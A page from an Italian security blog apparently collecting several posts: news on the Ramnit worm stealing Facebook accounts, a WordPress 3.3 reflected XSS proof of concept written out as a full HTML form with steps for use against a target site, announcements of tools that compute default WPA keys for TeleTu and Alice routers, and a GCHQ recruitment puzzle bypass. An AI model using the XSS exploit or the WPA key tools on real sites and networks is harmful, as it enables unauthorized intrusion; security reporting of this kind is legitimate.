Capn3m0 WebSecurity

Ramnit è il nome di un virus che in queste ultime ore si sta facendo conoscere per aver rubato già 45000 account Facebook. E non intende fermarsi!

Ramnit era stato già usato in passato dai cybercriminali per sferrare attacchi che avevano portato al furto di migliaia di account bancari o di aziende/servizi noti.

Ultimamente è stato nuovamente utilizzato per rubare account Facebook e per ora le stime indicano che questi cybercriminali sono in possesso di 45mila account Facebook e si prevede che continui a diffondersi.

La maggioranza dei Pc infetti da Ramnit sono dislocati tra Inghilterra e Francia e gli addetti ai lavori comunicano che circail 17% delle nuove infezioni da virus rilevate in rete sono a causa sua.

L’attacco si manifesta in un link postato sulla nostra bacheca Facebook da parte di qualche nostro amico “già infetto”. Se, quindi, vi capita di trovare postati sul vostro profilo Facebook video o links che non dovrebbero riguardarvi/interessarvi cancellateli senza andare a visualizzarli. Visionandoli si verrebbe redirettati ad un sito malevolo che in maniera nascosta infetterebbe il nostro Pc.

Alla fine del 2011 i ricercatori avevano stimato che i Pc infettati da Ramnit erano circa 800 mila. Il funzionamento è quello tipico dei Worm. In questo caso i pc infetti non lamentano anomalie di funzionamento ma in background restano in ascolto di comandi da parte del Server Ramnit gestito dai cybercriminali. Questi in qualsiasi momento possono inviare comandi a tutti i Pc infetti (zombies) per eseguire azioni come appunto l’invio dei propri dati di accesso salvati sul Pc, il click su un particolare link o qualsiasi altro comando.

Se una volta i virus erano finalizzati a creare disservizi e malfunzionamenti alla singola postazione infetta, con l’avvento della Rete il concetto di virus si è ridefinito e ora i singoli Pc non sono considerati “vittime” ma  “strumenti” tramite cui il virus agisce.

800mila Pc pronti ad eseguire una singola azione possono aprire porte a guadagni o attacchi di vasta scala che una volta, il singolo hacker o gruppo di hacker, non era in grado di realizzare proprio per una questione di infrastrutture. Fare un Denial Of Service verso una grande azienda in Rete era difficile poiché si necessitava di un numero di Pc e di una quantità tali di Banda da saturare quella del Server. E qualche amico con qualche Pc non potevano riuscire nell’impresa. Con i virus che danno la possibilità di comandare tutti quelli infetti in un solo click il problema è stato risolto. Lo stesso vale per le azioni volte a guadagnare. Ci conosce AdSense o  altri Servizi di guadagno on line saprà che non è possibile (o quasi) creare fake link per far aumentare le nostre entrate. Pensate a 800mila Pc diversi che cliccano il vostro banner! Agli occhi di Google saranno 800mila persone diverse e quindi saranno tutti click validi e pagati. Questi sono solo alcuni esempi per spiegare perché i virus attuali non sono più interessati a danneggiare o creare disservizi.

Tornando a Ramnit consiglio a tutti quelli che pensano di essere stati vittima del worm di effettuare una scansione con l’Antivirus aggiornato e un cambio password dell’account Facebook ma anche di tutti gli altri eventuali Servizi nei erano usate le stesse credenziali.

Per via di tutti i servizi a cui siamo iscritti per evitare di avere tante password diverse siamo soliti utilizzarne una per tutto. Di questa tendenza sono al corrente anche i cybercriminali e qindi proveranno i dati Facebook rubati per accedere anche per altri Servizi noti (Gmail, Yahoo,YouTube,Account Ftp,Corporate SSL VPN, Outlook Web Access, etc.). E’ quindi consigliabile cambiarle tutte.

Solitamente l’accesso a questi altri Servizi diversi da FaceBook viene utilizzato per diffondere il virus tramite altri canali (mandando mail alle rubriche, inserendo codici malevoli nei propri siti web gestiti via Ftp, etc.).

Consiglio inoltre di diffidare da link inviati da amici che sappiamo risiedere in Francia o Inghilterra dato che c’è maggiore probabilità che loro o i loro amici possano essere infetti.

Aggiornate i vostri Antivirus e diffidate dai post su FaceBook che non vi convincono!

Ai seguenti link trovate la scheda dettagliata (e le istruzioni per la rimozione) di questa ultima versione di Ramnit:

• McAfee
• Microsoft Security Portal

A pochi giorni dal rilascio della nuova versione di WordPress, la 3.3, due hacker indiani hanno individuato una vulnerabilità che permette di eseguire codice XSS sfruttando un problema nel form di pubblicazione dei commenti.

Praticamente per eseguire l’exploit è necessario per prima cosa pubblicare un commento sul WordPress vittima.

Una volta fatto ciò è necessario creare una pagina contente il seguente codice e pubblicarla in un proprio spazio Web.

<html>
<title>Wordpress 3.3 XSS PoC</title>
<body>
<form name="XSS" id="XSS" action="http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>" method="POST">
<input type="hidden" name="author" value="replace me"/>
<input type="hidden" name="email" value="replace me"/>
<input type="hidden" name="url" value=""/>
<input type="hidden" name="comment" value="replace me"/>
<input type="hidden" name="submit" value="Post Comment"/>
<input type="hidden" name="comment_post_ID" value="replace me"/>
<input type="hidden" name="comment_parent" value="0"/>
<input type="button" value="Click Me" />
</style></form>
</body>
</html>

Al posto di “replace me” vanno inseriti gli stessi dati usati nel precedente commento e al posto di “http://192.168.1.102/wordpress/” va inserito il riferimento del sito vittima.

A questo punto basterà cliccare sul tasto “Click me” e lo script provvederà nuovamente a pubblicare il post. Trovandolo già pubblicato genererà un errore di cotenuto duplicato ma il codice Javascript inserito nel “form action” della nostra pagina verrà eseguito.

Nell’esempio il codice Javascript da eseguire era il seguente:

<script>document.write(Date())</script>

che serve a visualizzare la data di sistema e, come si vede dalla seguente immagine,viene correttamenete eseguito dimostrando la vulnerabilità XSS.

In attesa di sviluppi e di una patch credo sia utile attivare temporaneamente un captcha o similare per i commenti così da evitare o almeno diminuire la possibilità di venire attaccati.

Link di riferimento

Zero Day Reflected Cross Site Scripting vulnerability in WordPress 3.3 – The Hackers News
Sorgenti Pastebin.com

Lo scorso 27 Novembre lo Staff del noto Team WifiShark hanno rilasciato l’ultima versione, la 1.3, del tool per calcolare le chiavi Wpa per le reti Teletu.

L’utente swsooue l’ha pubblicato tramite il Forum della Community WifiShark in questo post.

In questa ultima versione del Teletu Wpa Finder sono stati aumentati i macig numbers e di conseguenza sarà possibile calcolare le chiavi Wpa di un numero maggiore di SSID.

Potete effettuare il download dal seguente link:

TeleTu Wpa Finder 1.3 DOWNLOAD

Ringraziamo la community WifiShark per la passione e la dedizione nello studio delle reti Wireless.

N.B.

Ricordo che l’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge (art. 615-ter c.p.).

Ricordo che la detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici è un reato penale perseguibile secondo la legge 615.

L’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.

La notizia ha già fatto il giro del mondo ma comunque è degna di nota.

La sigla GCHQ non ci ricorda molto ma nelle ultime ore ogni blog o sito addetto ai lavori ne parla e ne ride.

Il GCHQ altro non è che il Government Communications Headquarters, ossia l’agenzia inglese per lo spionaggio delle comunicazioni che lavora a stretto contatto con i Servizi Segreti MI5 e MI6 per proteggere, monitorare e intervenire per la sicurezza dell’Inghilterra e dei suoi cittadini, in primis la Regina!

Dal nome e da questa breve descrizione ci si aspetta un team dei migliori hackers inglesi che giorno e notte veglia sulla vecchia Inghilterra per evitare che qualcuno decida di attaccarla o creargli problemi. Per fare ciò hanno bisogno di nuovi analisti e perciò, in gran segreto, hanno deciso di indire un concorso dal nome “Can you crack it?” dove solo chi riesce a risolvere l’enigma può avere accesso all’area dove si lasciano i propri dati e ci si candida per l’offerta di lavoro.

Il “concorso” è a tempo, dura 10 giorni (nel momento in cui scrivo mancano ancora 8 giorni e 16 ore) e consiste nel decriptare un codice partendo da una tabella di coppie di valori esadecimali.

Questa l’home page del sito:

Il motivo per cui tale notizia continua a far scalpore è dovuto al fatto che con una semplice ricerca su Google è stato possibile bypassare la pagina iniziale ed arrivare direttamente a quella dove lasci i dati per candidarti all’offerta di lavoro.

Per trovarla è bastato eseguire la più semplice delle ricerche di Google:

inurl:canyoucrackit.co.uk

e tra i primi risultati si ottiene l’url:

http://www.canyoucrackit.co.uk/soyoudidit.asp

che porta direttamente alla pagina di congratulazioni.

Una svista non da poco per chi dovrebbe difendere la Regina!

Dopo la scoperta la pagina è stata tolta dall’indicizzazione di Google ma ormai la notizia era arrivata alle orecchie di tutti.

Per chi volesse mettere alla prova le sue abilità cercando in Internet potrà trovare molte informazioni su come effettuare il decrypt corretto dell’esercizio

Qui trovate la soluzione, invece!

Dopo il successo di ieri con la pubblicazione del Fastweb Wpa Calculator OnLine oggi provvediamo ad annunciare il rilascio della prima versione dell’Alice Wpa Calculator OnLine.

In questa prima versione sono presenti tutti i Magic Numbers aggiornati a Settembre 2011 ed è possibile calcolare la Wpa sia inserendo il solo SSID Alice (Es. Alice-12345678) sia inserendo SSID più Mac Address del Modem.

Per ora vi invitiamo a testare il nostro tool per il calcolo delle Wpa Alice direttamente online e qualora dovessero verificarsi anomalie o errori contattateci.

PROVATELO QUI

N.B.

Ricordo che l’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge (art. 615-ter c.p.).

Ricordo che la detenzione e la diffusione abusiva di codici di accesso a sistemi informatici o telematici è un reato penale perseguibile secondo la legge 615.

L’utilizzo di quanto esposto è da riferirsi a un test di sicurezza sulla propria rete o su una rete di cui il proprietario abbia espressamente dato il libero consenso al fine di giudicarne la sicurezza e porre rimedio ad eventuali vulnerabilità.